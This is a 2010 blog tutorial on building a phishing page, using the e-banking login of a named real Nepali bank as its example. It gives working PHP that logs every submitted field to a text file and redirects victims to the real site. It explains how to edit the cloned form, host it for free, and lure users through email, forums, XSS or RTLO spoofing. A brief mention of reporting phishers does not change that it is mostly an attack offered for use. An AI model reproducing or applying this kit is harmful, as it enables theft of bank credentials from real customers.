Wednesday 13 October 2010

Making a fake login page [tutorial on phishers for beginners]

This tutorial will give you basic idea of what phishers are and how to create a simple phisher. Please be sure to comment on this post.

A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.

Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.

b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.

c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).

d) Now create a PHP file called phisher.php and paste the code below:

<?php
header("location:https://www.nibl.com.np/BankAwayRetail/sgonHttpHandler.aspx?Action.RetUser.Init.001=Y&AppSignonBankId=004&AppType=retail");
$fp = fopen("passes.txt","a");

foreach ($_REQUEST as $var => $val)
{
    fwrite($fp, $var." = ".$val."\r\n");
}
fwrite($fp,"\r\n");
fclose($fp);
?>

e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:

<form action="phisher.php" method="POST" name="RetailSignOn">

f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use t35.com). Be sure to create passes.txt and set proper permission in the webserver.

g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.

Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to www.phishtank.com.

I hope you learn something from this phishing tutorial. Have fun. :)